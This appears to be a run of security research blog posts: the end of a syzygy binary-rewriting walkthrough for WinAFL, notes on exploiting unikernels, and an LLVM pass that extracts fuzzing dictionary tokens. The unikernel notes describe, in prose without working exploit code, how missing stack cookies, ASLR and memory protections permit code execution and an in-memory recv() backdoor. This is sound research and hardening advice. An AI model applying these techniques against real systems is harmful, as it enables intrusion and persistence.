block_desc->basic_block_order.pushf_back(bb);
BasicBlockAssembler assm(bb->instructions().begin(), &bb->instructions());
assm.mov(Operand(Displacement(kInvalidUserAddress)), assm::eax);

// Condense into a block.
BlockBuilder block_builder(block_graph);
if (!block_builder.Merge(&bbsg)) {
  LOG(ERROR) << "Failed to build " << kSyzygyReportGsFailure << " block.";
  return false;
}

DCHECK_EQ(1u, block_builder.new_blocks().size());

Finally, I update all the referrers to point to our new Block, and remove the __report_gsfailure Block as it is effectively now dead-code:

// Transfer the referrers to the new block, and delete the old one.
BlockGraph::Block* syzygy_report_gsfailure =
    block_builder.new_blocks().front();
report_gsfailure->TransferReferrers(
    0, syzygy_report_gsfailure,
    BlockGraph::Block::kTransferInternalReferences);

report_gsfailure->RemoveAllReferences();
if (!block_graph->RemoveBlock(report_gsfailure)) {
  LOG(ERROR) << "Removing " << kReportGsFailure << " failed.";
  return false;
}

Here is what it looks like after our transformation:

; void __fastcall __security_check_cookie(unsigned int cookie)
@__security_check_cookie@4 proc near
cookie = ecx
                cmp     cookie, ___security_cookie
                repne jnz short failure
                repne retn
failure:
                repne jmp loc_426EE6 <- our new __report_gsfailure block

loc_426EE6:
                mov     ds:0DEADBEEFh, eax

One does not simply binary rewrite

It may look like an easy problem without any pitfall, but before settling down on the solution above I actually first tried to rewrite the __security_check_cookie function. I thought it would be cleaner and it was also very easy to do with syzygy. I had to create a new Block, and transfer the referrers to my new block and.. that was it!

Now it was working fine on a bunch of targets on various OSs: Windows 7, Windows 8, Windows 8.1, Windows 10. Until I started notice some instrumented binaries that would not even execute; the loader would not load the binary and I was left with some message box telling me the binary could not be loaded in memory: STATUS_INVALID_IMAGE_FORMAT or 0xc000007b. This was pretty mysterious at first as the instrumented binary would run fine on Windows 7 but not on Windows 10. The instrumented binary also looked instrumented fine - the way I wanted it to be instrumented: all the callers of __security_check_cookie were now calling into my new function and nothing seemed off.

At this point, the only thing I knew was that the PE loader was not happy with the file; so that is where I started my investigation. After hours of back and forth between ntdll and the kernel I found that the CFG [LoadConfigDirectory.GuardCFFunctionTable](https://msdn.microsoft.com/en-us/library/windows/desktop/ms680547(v=vs.85).aspx) table (where the compiler puts all the valid indirect-call targets) embedded in binaries is expected to be ordered from low to high RVAs. I have also realized at this point that one of the referrer of my block was this CFG table, that would get fixed-up with the RVA of wherever the new block was placed by the binary rewriting framework. And of course, in some cases this RVA would end up being greater than the RVA right after in the table... upsetting the loader.

security_cookie_GuardCFFunctionTable.png
All of this to say that even though the framework is robust, binary rewriting can be hard when instrumenting unknown target that may make assumptions on the way their functions look, or how some part of the code / data is laid out, etc. So keep that in mind while playing :).

Last words

In this post I have introduced the syzygy framework, presented some of its strengths as well as limitations, and illustrated what can you do with it on two simple examples. I am hoping to be able to write a second post where I can talk a bit more of two other transforms I have designed to built the static instrumentation mode of WinAFL and how every pieces work together. I would also like to try to see if I can't cook some obfuscation or something of the sort.

As usual you can find the codes on my github here: stuffz/syzygy.

If you can't wait for the next post, you can have already a look at add_implicit_tls_transform.cc and afl_transform.cc.

Last but not least, special shout-outs to my proofreader yrp.

happy unikernels

By: yrp
22 December 2016 at 02:59

Intro

Below is a collection of notes regarding unikernels. I had originally prepared this stuff to submit to EkoParty’s CFP, but ended up not wanting to devote time to stabilizing PHP7’s heap structures and I lost interest in the rest of the project before it was complete. However, there are still some cool takeaways I figured I could write down. Maybe they’ll come in handy? If so, please let let me know.

Unikernels are a continuation of turning everything into a container or VM. Basically, as many VMs currently just run one userland application, the idea is that we can simplify our entire software stack by removing the userland/kernelland barrier and essentially compiling our usermode process into the kernel. This is, in the implementation I looked at, done with a NetBSD kernel and a variety of either native or lightly-patched POSIX applications (bonus: there is significant lag time between upstream fixes and rump package fixes, just like every other containerized solution).

While I don’t necessarily think that conceptually unikernels are a good idea (attack surface reduction vs mitigation removal), I do think people will start more widely deploying them shortly and I was curious what memory corruption exploitation would look like inside of them, and more generally what your payload options are like.

All of the following is based off of two unikernel programs, nginx and php5 and only makes use of public vulnerabilities. I am happy to provide all referenced code (in varying states of incompleteness), on request.

Basic ‘Hello World’ Example

To get a basic understanding of a unikernel, we’ll walk through a simple ‘Hello World’ example. First, you’ll need to clone and build (./build-rr.sh) the rumprun toolchain. This will set you up with the various utilities you'll need.

Compiling and ‘Baking’

In a rumpkernel application, we have a standard POSIX environment, minus anything involving multiple processes. Standard memory, file system, and networking calls all work as expected. The only differences lie in the multi-process related calls such as fork(), signal(), pthread_create(), etc. The scope of these differences can be found in the The Design and Implementation of the Anykernel and Rump Kernels [pdf].

From a super basic, standard ‘hello world’ program:

#include <stdio.h>
void main(void)
{
    printf("Hello\n");
}

After building rumprun we should have a new compiler, x86_64-rumprun-netbsd-gcc. This is a cross compiler targeting the rumpkernel platform. We can compile as normal x86_64-rumprun-netbsd-gcc hello.c -o hello-rump and in fact the output is an ELF: hello-rump: ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped. However, as we obviously cannot directly boot an ELF we must manipulate the executable ('baking' in rumpkernel terms).

Rump kernels provide a rumprun-bake shell script. This script takes an ELF from compiling with the rumprun toolchain and converts it into a bootable image which we can then give to qemu or xen. Continuing in our example: rumprun-bake hw_generic hello.bin hello-rump, where the hw_generic just indicates we are targeting qemu.

Booting and Debugging

At this point assuming you have qemu installed, booting your new image should be as easy as rumprun qemu -g "-curses" -i hello.bin. If everything went according to plan, you should see something like:

hello

Because this is just qemu at this point, if you need to debug you can easily attach via qemu’s system debugger. Additionally, a nice side effect of this toolchain is very easy debugging — you can essentially debug most of your problems on the native architecture, then just switch compilers to build a bootable image. Also, because the boot time is so much faster, debugging and fixing problems is vastly sped up.

If you have further questions, or would like more detail, the Rumpkernel Wiki has some very good documents explaining the various components and options.

Peek/Poke Tool

Initially to develop some familiarity with the code, I wrote a simple peek/poke primitive process. The VM would boot and expose a tcp socket that would allow clients read or write arbitrary memory, as well as wrappers around malloc() and free() to play with the heap state. Most of the knowledge here is derived from this test code, poking at it with a debugger, and reading the rump kernel source.

Memory Protections

One of the benefits of unikernels is you can prune components you might not need. For example, if your unikernel application does not touch the filesystem, that code can be removed from your resulting VM. One interesting consequence of this involves only running one process — because there is only one process running on the VM, there is no need for a virtual memory system to separate address spaces by process.

Right now this means that all memory is read-write-execute. I'm not sure if it's possible to configure the MMU in a hypervisor to enforce memory proections without enabling virtual memory, as most of the virtual memory code I've looked at has been related to process separation with page tables, etc. In any case, currently it’s pretty trivial to introduce new code into the system and there shouldn’t be much need to resort to ROP.

nginx

Nginx was the first target I looked at; I figured I could dig up the stack smash from 2013 (CVE-2013-2028) and use that as a baseline exploit to see what was possible. This ultimately failed, but exposed some interesting things along the way.

Reason Why This Doesn’t Work

CVE-2013-2028 is a stack buffer overflow in the nginx handler for chunked requests. I thought this would be a good test as the user controls much of the data on the stack, however, various attempts to trigger the overflow failed. Running the VM in a debugger you could see the bug was not triggered despite the size value being large enough. In fact, the syscall returned an error.

It turns out however that NetBSD has code to prevent against this inside the kernel:

do_sys_recvmsg_so(struct lwp *l, int s, struct socket *so, struct msghdr *mp,
        struct mbuf **from, struct mbuf **control, register_t *retsize) {
// …
        if (tiov->iov_len > SSIZE_MAX || auio.uio_resid > SSIZE_MAX) {
            error = EINVAL;
            goto out;
        }
// …

iov_len is our recv() size parameter, so this bug is dead in the water. As an aside, this also made me wonder how Linux applications would respond if you passed a size greater than LONG_MAX into recv() and it succeeded…

Something Interesting

Traditionally when exploiting this bug one has to worry about stack cookies. Nginx has a worker pool of processes forked from the main process. In the event of a crash, a new process will be forked from the parent, meaning that the stack cookie will remain constant across subsequent connections. This allows you to break it down into four, 1 byte brute forces as opposed to one 4 byte, meaning it can be done in a maximum of 1024 connections. However, inside the unikernel, there is only one process — if a process crashes the entire VM must be restarted, and because the only process is the kernel, the stack cookie should (in theory) be regenerated. Looking at the disassembled nginx code, you can see the stack cookie checks in all off the relevant functions.

In practice, the point is moot because the stack cookies are always zero. The compiler creates and checks the cookies, it just never populates fs:0x28 (the location of the cookie value), so it’s always a constant value and assuming you can write null bytes, this should pose no problem.

ASLR

I was curious if unikernels would implement some form of ASLR, as during the build process they get compiled to an ELF (which is quite nice for analysis!) which might make position independent code easier to deal with. They don’t: all images are loaded at 0x100000. There is however "natures ASLR" as these images aren’t distributed in binary form. Thus, as everyone must compile their own images, these will vary slightly depending on compiler version, software version, etc. However, even this constraint gets made easier. If you look at the format of the loaded images, they look something like this:

0x100000: <unikernel init code>
…
0x110410: <application code starts>

This means across any unikernel application you’ll have approximately 0x10000 bytes of fixed value, fixed location executable memory. If you find an exploitable bug it should be possible to construct a payload entirely from the code in this section. This payload could be used to leak the application code, install persistence, whatever.

PHP

Once nginx was off the table, I needed another application that had a rumpkernel package and a history of exploitable bugs. The PHP interpreter fits the bill. I ended up using Sean Heelan's PHP bug #70068, because of the provided trigger in the bug description, and detailed description explaining the bug. Rather than try to poorly recap Sean's work, I'd encourage you to just read the inital report if you're curious about the bug.

In retrospect, I took a poor exploitation path for this bug. Because the heap slabs have no ASLR, you can fairly confidently predict mapped addresses inside the PHP interpreter. Furthermore, by controlling the size of the payload, you can determine which bucket it will fall into and pick a lesser used bucket for more stability. This allows you to be lazy, and hard code payload addresses, leading to easy exploitation. This works very well -- I was basically able to take Sean's trigger, slap some addresses and a payload into it, and get code exec out of it. However, the downsides to this approach quickly became apparent. When trying to return from my payload and leave the interpreter in a sane state (as in, running) I realized that I would need to actually understand the PHP heap to repair it. I started this process by examining the rump heap (see below), but got bored when I ended up in the PHP heap.

Persistence

This was the portion I wanted to finish for EkoParty, and it didn’t get done. In theory, as all memory is read-write-execute, it should be pretty trivial to just patch recv() or something to inspect the data received, and if matching some constant execute the rest of the packet. This is strictly in memory, anything touching disk will be application specific.

Assuming your payload is stable, you should be able to install an in-memory backdoor which will persist for the runtime of that session (and be deleted on poweroff). While in many configurations there is no writable persistent storage which will survive reboots this is not true for all unikernels (e.g. mysql). In those cases it might be possible to persist across power cycles, but this will be application specific.

One final, and hopefully obvious note: one of the largest differences in exploitation of unikernels is the lack of multiple processes. Exploits frequently use the existence of multiple processes to avoid cleaning up application state after a payload is run. In a unikernel, your payload must repair application state or crash the VM. In this way it is much more similar to a kernel exploit.

Heap Notes

The unikernel heap is quite nice from an exploitation perspective. It's a slab-style allocator with in-line metadata on every block. Specifically, the metadata contains the ‘bucket’ the allocation belongs to (and thus the freelist the block should be released to). This means a relative overwrite plus free()ing into a smaller bucket should allow for fairly fine grained control of contents. Additionally the heap is LIFO, allowing for standard heap massaging.

Also, while kinda untested, I believe rumpkernel applications are compiled without QUEUEDEBUG defined. This is relevant as the sanity checks on unlink operations ("safe unlink") require this to be defined. This means that in some cases, if freelists themselves can be overflown then removed you can get a write-what-where. However, I think this is fairly unlikely in practice, and with the lack of memory protections elsewhere, I'd be surprised if it would currently be useful.

You can find most of the relevant heap source here

Symbol Resolution

Rumpkernels helpfully include an entire syscall table under the mysys symbol. When rumpkernel images get loaded, the ELF header gets stripped, but the rest of the memory is loaded contigiously:

gef➤  info file
Symbols from "/home/x/rumprun-packages/php5/bin/php.bin".
Remote serial target in gdb-specific protocol:
Debugging a target over a serial line.
        While running this, GDB does not access memory from...
Local exec file:
        `/home/x/rumprun-packages/php5/bin/php.bin', file type elf64-x86-64.
        Entry point: 0x104000
        0x0000000000100000 - 0x0000000000101020 is .bootstrap
        0x0000000000102000 - 0x00000000008df31c is .text
        0x00000000008df31c - 0x00000000008df321 is .init
        0x00000000008df340 - 0x0000000000bba9f0 is .rodata
        0x0000000000bba9f0 - 0x0000000000cfbcd0 is .eh_frame
        0x0000000000cfbcd0 - 0x0000000000cfbd28 is link_set_sysctl_funcs
        0x0000000000cfbd28 - 0x0000000000cfbd50 is link_set_bufq_strats
        0x0000000000cfbd50 - 0x0000000000cfbde0 is link_set_modules
        0x0000000000cfbde0 - 0x0000000000cfbf18 is link_set_rump_components
        0x0000000000cfbf18 - 0x0000000000cfbf60 is link_set_domains
        0x0000000000cfbf60 - 0x0000000000cfbf88 is link_set_evcnts
        0x0000000000cfbf88 - 0x0000000000cfbf90 is link_set_dkwedge_methods
        0x0000000000cfbf90 - 0x0000000000cfbfd0 is link_set_prop_linkpools
        0x0000000000cfbfd0 - 0x0000000000cfbfe0 is .initfini
        0x0000000000cfc000 - 0x0000000000d426cc is .data
        0x0000000000d426d0 - 0x0000000000d426d8 is .got
        0x0000000000d426d8 - 0x0000000000d426f0 is .got.plt
        0x0000000000d426f0 - 0x0000000000d42710 is .tbss
        0x0000000000d42700 - 0x0000000000e57320 is .bss

This means you should be able to just run simple linear scan, looking for the mysys table. A basic heuristic should be fine, 8 byte syscall number, 8 byte address. In the PHP5 interpreter, this table has 67 entries, giving it a big, fat footprint:

gef➤  x/6g mysys
0xaeea60 <mysys>:       0x0000000000000003      0x000000000080b790 -- <sys_read>
0xaeea70 <mysys+16>:    0x0000000000000004      0x000000000080b9d0 -- <sys_write>
0xaeea80 <mysys+32>:    0x0000000000000006      0x000000000080c8e0 -- <sys_close>
...

There is probably a chain of pointers in the initial constant 0x10410 bytes you could also follow, but this approach should work fine.

Hypervisor fuzzing

After playing with these for a while, I had another idea: rather than using unikernels to host userland services, I think there is a really cool opportunity to write a hypervisor fuzzer in a unikernel. Consider: You have all the benefits of a POSIX userland only you’re in ring0. You don’t need to export your data to userland to get easy and familiar IO functions. Unikernels boot really, really fast. As in under 1 second. This should allow for pretty quick state clearing.

This is definitely an area of interesting future work I’d like to come back to.

Final Suggestions

If you develop unikernels:

  • Populate the randomness for stack cookies.
  • Load at a random location for some semblance of ASLR.
  • Is there a way you can enforce memory permissions? Some form of NX would go a long way.
  • If you can’t, some control flow integrity stuff might be a good idea? Haven’t really thought this through or tried it.
  • Take as many lessons from grsec as possible.

If you’re exploiting unikernels:

  • Have fun.

If you’re exploiting hypervisors:

  • Unikernels might provide a cool platform to easily play in ring0.

Thanks

For feedback, bugs used, or editing @seanhn, @hugospns, @0vercl0k, @darkarnium, other quite helpful anonymous types.

Token capture via an llvm-based analysis pass

Introduction

About three years ago, the LLVM framework started to pique my interest for a lot of different reasons. This collection of industrial strength compiler technology, as Latner said in 2008, was designed in a very modular way. It also looked like it had a lot of interesting features that could be used in a lot of (different) domains: code-optimization (think deobfuscation), (architecture independent) code obfuscation, static code instrumentation (think sanitizers), static analysis, for runtime software exploitation mitigations (think cfi, safestack), power a fuzzing framework (think libFuzzer), ..you name it.

A lot of the power that came with this giant library was partly because it would operate in mainly three stages, and you were free to hook your code in any of those: front-end, mid-end, back-end. Other strengths included: the high number of back-ends, the documentation, the C/C++ APIs, the community, ease of use compared to gcc (see below from kcc's presentation), etc.

GCC from a newcomer's perspective
The front-end part takes as input source code and generates LLVM IL code, the middle part operates on LLVM IL and finally the last one receives LLVM IL in order to output assembly code and or an executable file.

Major components in a three phase compiler
In this post we will walk through a simple LLVM pass that does neither optimization, nor obfuscation; but acts more as a token finder for fuzzing purposes.

Background

Source of inspiration

If you haven't heard of the new lcamtuf's coverage-guided fuzzer, it's most likely because you have lived in a cave for the past year or two as it has been basically mentioned everywhere (now on this blog too!). The sources, the documentation and the afl-users group are really awesome resources if you'd like to know a little bit more and follow its development.

What you have to know for this post though, is that the fuzzer generates test cases and will pick and keep the interesting ones based on the code-coverage that they will exercise. You end-up with a set of test cases covering different part of the code, and can spend more time hammering and mutating a small number of files, instead of a zillion. It is also packed with clever hacks that just makes it one of the most used/easy fuzzer to use today (don't ask me for proof to back this claim).

In order to measure the code-coverage, the first version of AFL would hook in the compiler toolchain and instrument basic block in the .S files generated by gcc. The instrumentation flips a bit in a bitmap as a sign of "I've executed this part of the code". This tiny per-block static instrumentation (as opposed to DBI based ones) makes it hella fast, and can actually be used while fuzzing without too much of overheard. After a little bit of time, an LLVM based version has been designed (by László Szekeres and lcamtuf) in order to be less hacky, architecture independent (bonus that you get for free when writing a pass), and very elegant (no more reading/modifying raw .S files). The way this has been implemented is hooking into the mid-end in order to statically add the extra instrumentation afl-fuzz needs to have the code-coverage feedback. This is now known as afl-clang-fast.

A little later, some discussions on the googlegroup led the readers to believe that knowing "magics" used by a library would make the fuzzing more efficient. If I know all the magics and have a way to detect where they are located in a test-case, then I can use them instead of bit-flipping and hope it would lead to "better" fuzzing. This list of "magics" is called a dictionary. And what I just called "magics" are "tokens". You can provide such a dictionary (list of tokens) to afl via the -X option. In order to ease, automate the process of semi-automatically generate a dictionary file, lcamtuf developed a runtime solution based on LD_PRELOAD and instrumenting calls to memory compare like routines: strcmp, memcmp, etc. If one of the argument comes from a read-only section, then it is most likely a token and it is most likely a good candidate for the dictionary. This is called afl-tokencap.

afl-llvm-tokencap

What if instead of relying on a runtime solution that requires you to:

  • Have built a complete enough corpus to exercise the code that will expose the tokens,
  • Recompile your target with a set of extra options that tell your compiler to not use the built-ins version of strcmp/strncmp/etc,
  • Run every test cases through the new binary with the libtokencap LD_PRELOAD'd.

..we build the dictionary at compile time. The idea behind this, is to have another pass hooking the build process, is looking for tokens at compile time and is building a dictionary ready to use for your first fuzz run. Thanks to LLVM this can be written with less than 400 lines of code. It is also easy to read, easy to write and is architecture independent as it is even running before the back-end.

This is the problem that I will walk you through in this post, AKA yet-another-example-of-llvm-pass. Here we are anyway, an occasion to get back at blogging one might even say!

Before diving in, here what we actually want the pass to do:

  • Walk through every instructions compiled, find all the function calls,
  • When the function call target is one of the function of interest (strcmp, memcmp, etc), we extract the arguments,
  • If one of the arguments is an hard-coded string, then we save it as a token in the dictionary being built at compile time.

afl-llvm-tokencap-pass.so.cc

In case you are already very familiar with LLVM and its pass mechanism, here is afl-llvm-tokencap-pass.so.cc and the afl.patch - it is about 300 lines of C++ and is pretty straightforward to understand.

Now, for all the others that would like a walk-through the source code let's do it.

AFLTokenCap class

The most important part of this file is the AFLTokenCap class which is walking through the LLVM IL instructions looking for tokens. LLVM gives you the possibility to work at different granularity levels when writing a pass (more granular to the less granular): BasicBlockPass, FunctionPass, ModulePass, etc. Note that those are not the only ones, there are quite a few others that work slightly differently: MachineFunctionPass, RegionPass, LoopPass, etc.

When you are writing a pass, you write a class that subclasses a *Pass parent class. Doing that means you are expected to implement different virtual methods that will be called under specific circumstances - but basically you have three functions: doInitialization, runOn* and doFinalization. The first one and the last one are rarely used, but they can provide you a way to execute code once all the basic-blocks have been run through or prior. The runOn* function is important though: this is the function that is going to get called with an LLVM object you are free to walk-through (Analysis passes according to the LLVM nomenclature) or modify (Transformation passes) it. As I said above, the LLVM objects are basically Module/Function/BasicBlock instances. In case it is not that obvious, a Module (a .c file) is made of Functions, and a Function is made of BasicBlocks, and a BasicBlock is a set of Instructions. I also suggest you take a look at the HelloWorld pass from the LLVM wiki, it should give you another simple example to wrap your head around the concept of pass.

For today's use-case I have chosen to subclass BasicBlockPass because our analysis doesn't need anything else than a BasicBlock to work. This is the case because we are mainly interested to capture certain arguments passed to certain function calls. Here is what looks like a function call in the LLVM IR world:

%retval = call i32 @test(i32 %argc)
call i32 (i8*, ...)* @printf(i8* %msg, i32 12, i8 42)   ; yields i32
%X = tail call i32 @foo()                               ; yields i32
%Y = tail call fastcc i32 @foo()                        ; yields i32
call void %foo(i8 97 signext)

%struct.A = type { i32, i8 }
%r = call %struct.A @foo()             ; yields { i32, i8 }
%gr = extractvalue %struct.A %r, 0     ; yields i32
%gr1 = extractvalue %struct.A %r, 1    ; yields i8
%Z = call void @foo() noreturn         ; indicates that %foo never returns normally
%ZZ = call zeroext i32 @bar()          ; Return value is %zero extended

Every time AFLTokenCap::runOnBasicBlock is called, the LLVM mid-end will call into our analysis pass (either statically linked into clang/opt or will dynamically load it) with a BasicBlock passed by reference. From there, we can iterate through the set of instructions contained in the basic block and find the call instructions. Every instructions subclass the top level llvm::Instruction class - in order to filter you can use the dyn_cast<T> template function that works like the dynamic_cast<T> operator but does not rely on RTTI (and is more efficient - according to the LLVM coding standards). Used in conjunction with a range-based for loop on the BasicBlock object you can iterate through all the instructions you want.

bool AFLTokenCap::runOnBasicBlock(BasicBlock &B) {

  for(auto &I_ : B) {

    /* Handle calls to functions of interest */
    if(CallInst *I = dyn_cast<CallInst>(&I_)) {

      // [...]
    }
  }
}

Once we have found a llvm::CallInst instance, we need to:

Not sure you have noticed yet, but all the objects we are playing with are not only subclassed from llvm::Instruction. You also have to deal with llvm::Value which is an even more top-level class (llvm::Instruction is a child of llvm::Value). But llvm::Value is also used to represent constants: think of hard-coded strings, integers, etc.

Detecting hard-coded strings

In order to detect hard-coded strings in the arguments passed to function calls, I decided to filter out the llvm::ConstantExpr. As its name suggests, this class handles "a constant value that is initialized with an expression using other constant values".

The end goal, is to find llvm::ConstantDataArrays and to retrieve their raw values - those will be the hard-coded strings we are looking for.

/home/over/workz/afl-2.35b/afl-clang-fast -c -W -Wall -O3 -funroll-loops   -fPIC -o png.pic.o png.c
[...]
afl-llvm-tokencap-pass 2.35b by <[email protected]>
[...]
[+] Call to memcmp with constant "\x00\x00\xf6\xd6\x00\x01\x00\x00\x00\x00\xd3" found in png.c/png_icc_check_header

At this point, the pass basically does what the token capture library is able to do.

Harvesting integer immediate

After playing around with it on libpng though, I quickly was wondering why the pass would not extract all the constants I could find in one of the dictionary already generated and shipped with afl:

// png.dict
section_IDAT="IDAT"
section_IEND="IEND"
section_IHDR="IHDR"
section_PLTE="PLTE"
section_bKGD="bKGD"
section_cHRM="cHRM"
section_fRAc="fRAc"
section_gAMA="gAMA"
section_gIFg="gIFg"
section_gIFt="gIFt"
section_gIFx="gIFx"
section_hIST="hIST"
section_iCCP="iCCP"
section_iTXt="iTXt"
...

Some of those can be found in the function png_push_read_chunk in the file pngpread.c for example:

//png_push_read_chunk
#define png_IHDR PNG_U32( 73,  72,  68,  82)
// ...
if (chunk_name == png_IHDR)
{
  if (png_ptr->push_length != 13)
      png_error(png_ptr, "Invalid IHDR length");

  PNG_PUSH_SAVE_BUFFER_IF_FULL
  png_handle_IHDR(png_ptr, info_ptr, png_ptr->push_length);
}
else if (chunk_name == png_IEND)
{
  PNG_PUSH_SAVE_BUFFER_IF_FULL
  png_handle_IEND(png_ptr, info_ptr, png_ptr->push_length);

  png_ptr->process_mode = PNG_READ_DONE_MODE;
  png_push_have_end(png_ptr, info_ptr);
}
else if (chunk_name == png_PLTE)
{
  PNG_PUSH_SAVE_BUFFER_IF_FULL
  png_handle_PLTE(png_ptr, info_ptr, png_ptr->push_length);
}

In order to also grab those guys, I have decided to add the support for compare instructions with integer immediate (in one of the operand). Again, thanks to LLVM this is really easy to pull that off: we just need to find the llvm::ICmpInst instructions. The only thing to keep in mind is false positives. In order to lower the false positives rate, I have chosen to consider an integer immediate as a token only if only it is fully ASCII (like the libpng tokens above)

We can even push it a bit more, and handle switch statements via the same strategy. The only additional step is to retrieve every cases from in the switch statement: llvm::SwitchInst::cases.

/* Handle switch/case with integer immediates */
else if(SwitchInst *SI = dyn_cast<SwitchInst>(&I_)) {
  for(auto &CIT : SI->cases()) {

    ConstantInt *CI = CIT.getCaseValue();
    dump_integer_token(CI);
  }
}

Limitations

The main limitation is that as you are supposed to run the pass as part of the compilation process, it is most likely going to end-up compiling tests or utilities that the library ships with. Now, this is annoying as it may add some noise to your tokens - especially with utility programs. Those ones usually parse input arguments and some use strcmp like function with hard-coded strings to do their parsing.

A partial solution (as in, it reduces the noise, but does not remove it entirely) I have implemented is just to not process any functions called main. Most of the cases I have seen (the set of samples is pretty small I won't lie >:]), this argument parsing is made in the main function and it is very easy to not process it by blacklisting it as you can see below:

bool AFLTokenCap::runOnBasicBlock(BasicBlock &B) {
// [...]
  Function *F = B.getParent();
  m_FunctionName = F->hasName() ? F->getName().data() : "unknown";

  if(strcmp(m_FunctionName, "main") == 0)
    return false;

Another thing I wanted to experiment on, but did not, was to provide a regular expression like string (think "test/*") and not process every files/path that are matching it. You could easily blacklist a whole directory of tests with this.

Demo

I have not spent much time trying it out on a lot of code-bases (feel free to send me your feedbacks if you run it on yours though!), but here are some example results with various degree of success.. or not. Starting with libpng:

over@bubuntu:~/workz/lpng1625$ AFL_TOKEN_FILE=/tmp/png.dict make
cp scripts/pnglibconf.h.prebuilt pnglibconf.h
/home/over/workz/afl-2.35b/afl-clang-fast -c -I../zlib  -W -Wall -O3 -funroll-loops   -o png.o png.c
afl-clang-fast 2.35b by <[email protected]>
afl-llvm-tokencap-pass 2.35b by <[email protected]>
afl-llvm-pass 2.35b by <[email protected]>
[+] Instrumented 945 locations (non-hardened mode, ratio 100%).
[+] Found alphanum constant "acsp" in png.c/png_icc_check_header
[+] Call to memcmp with constant "\x00\x00\xf6\xd6\x00\x01\x00\x00\x00\x00\xd3" found in png.c/png_icc_check_header
[+] Found alphanum constant "RGB " in png.c/png_icc_check_header
[+] Found alphanum constant "GRAY" in png.c/png_icc_check_header
[+] Found alphanum constant "scnr" in png.c/png_icc_check_header
[+] Found alphanum constant "mntr" in png.c/png_icc_check_header
[+] Found alphanum constant "prtr" in png.c/png_icc_check_header
[+] Found alphanum constant "spac" in png.c/png_icc_check_header
[+] Found alphanum constant "abst" in png.c/png_icc_check_header
[+] Found alphanum constant "link" in png.c/png_icc_check_header
[+] Found alphanum constant "nmcl" in png.c/png_icc_check_header
[+] Found alphanum constant "XYZ " in png.c/png_icc_check_header
[+] Found alphanum constant "Lab " in png.c/png_icc_check_header
[...]

over@bubuntu:~/workz/lpng1625$ sort -u /tmp/png.dict
"abst"
"acsp"
"bKGD"
"cHRM"
"gAMA"
"GRAY"
"hIST"
"iCCP"
"IDAT"
"IEND"
"IHDR"
"iTXt"
"Lab "
"link"
"mntr"
"nmcl"
"oFFs"
"pCAL"
"pHYs"
"PLTE"
"prtr"
"RGB "
"sBIT"
"sCAL"
"scnr"
"spac"
"sPLT"
"sRGB"
"tEXt"
"tIME"
"tRNS"
"\x00\x00\xf6\xd6\x00\x01\x00\x00\x00\x00\xd3"
"XYZ "
"zTXt"

On sqlite3 (sqlite.dict):

over@bubuntu:~/workz/sqlite3$ AFL_TOKEN_FILE=/tmp/sqlite.dict [/home/over/workz/afl-2.35b/afl-clang-fast stub.c sqlite3.c -lpthread -ldl -o a.out
[...]
afl-llvm-tokencap-pass 2.35b by <[email protected]>
afl-llvm-pass 2.35b by <[email protected]>
[+] Instrumented 47546 locations (non-hardened mode, ratio 100%).
[+] Call to strcmp with constant "unix-excl" found in sqlite3.c/unixOpen
[+] Call to memcmp with constant "SQLite format 3" found in sqlite3.c/sqlite3BtreeBeginTrans
[+] Call to memcmp with constant "@  " found in sqlite3.c/sqlite3BtreeBeginTrans
[+] Call to strcmp with constant "BINARY" found in sqlite3.c/sqlite3_step
[+] Call to strcmp with constant ":memory:" found in sqlite3.c/sqlite3BtreeOpen
[+] Call to strcmp with constant "nolock" found in sqlite3.c/sqlite3BtreeOpen
[+] Call to strcmp with constant "immutable" found in sqlite3.c/sqlite3BtreeOpen
[+] Call to memcmp with constant "\xd9\xd5\x05\xf9 \xa1c" found in sqlite3.c/syncJournal
[+] Found alphanum constant "char" in sqlite3.c/yy_reduce
[+] Found alphanum constant "clob" in sqlite3.c/yy_reduce
[+] Found alphanum constant "text" in sqlite3.c/yy_reduce
[+] Found alphanum constant "blob" in sqlite3.c/yy_reduce
[+] Found alphanum constant "real" in sqlite3.c/yy_reduce
[+] Found alphanum constant "floa" in sqlite3.c/yy_reduce
[+] Found alphanum constant "doub" in sqlite3.c/yy_reduce
[+] Call to strcmp with constant "sqlite_sequence" found in sqlite3.c/sqlite3StartTable
[+] Call to memcmp with constant "file:" found in sqlite3.c/sqlite3ParseUri
[+] Call to memcmp with constant "localhost" found in sqlite3.c/sqlite3ParseUri
[+] Call to memcmp with constant "vfs" found in sqlite3.c/sqlite3ParseUri
[+] Call to memcmp with constant "cache" found in sqlite3.c/sqlite3ParseUri
[+] Call to memcmp with constant "mode" found in sqlite3.c/sqlite3ParseUri
[+] Call to strcmp with constant "localtime" found in sqlite3.c/isDate
[+] Call to strcmp with constant "unixepoch" found in sqlite3.c/isDate
[+] Call to strncmp with constant "weekday " found in sqlite3.c/isDate
[+] Call to strncmp with constant "start of " found in sqlite3.c/isDate
[+] Call to strcmp with constant "month" found in sqlite3.c/isDate
[+] Call to strcmp with constant "year" found in sqlite3.c/isDate
[+] Call to strcmp with constant "hour" found in sqlite3.c/isDate
[+] Call to strcmp with constant "minute" found in sqlite3.c/isDate
[+] Call to strcmp with constant "second" found in sqlite3.c/isDate

over@bubuntu:~/workz/sqlite3$ sort -u /tmp/sqlite.dict
"@  "
"BINARY"
"blob"
"cache"
"char"
"clob"
"doub"
"file:"
"floa"
"hour"
"immutable"
"localhost"
"localtime"
":memory:"
"minute"
"mode"
"month"
"nolock"
"real"
"second"
"SQLite format 3"
"sqlite_sequence"
"start of "
"text"
"unixepoch"
"unix-excl"
"vfs"
"weekday "
"\xd9\xd5\x05\xf9 \xa1c"
"year"

On libxml2 (here is a library with a lot of test cases / utilities that raises the noise ratio in the tokens extracted - cf xmlShell* for example):

over@bubuntu:~/workz/libxml2$ CC=/home/over/workz/afl-2.35b/afl-clang-fast ./autogen.sh && AFL_TOKEN_FILE=/tmp/xml.dict make
[...]
afl-clang-fast 2.35b by <[email protected]>
afl-llvm-tokencap-pass 2.35b by <[email protected]>
afl-llvm-pass 2.35b by <[email protected]>
[+] Instrumented 668 locations (non-hardened mode, ratio 100%).
[+] Call to strcmp with constant "UTF-8" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "UTF8" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "UTF-16" found in encoding.c/xmlParseCharEncoding__internal_alias
[+] Call to strcmp with constant "UTF16" found in encoding.c/xmlParseCharEncoding__internal_alias
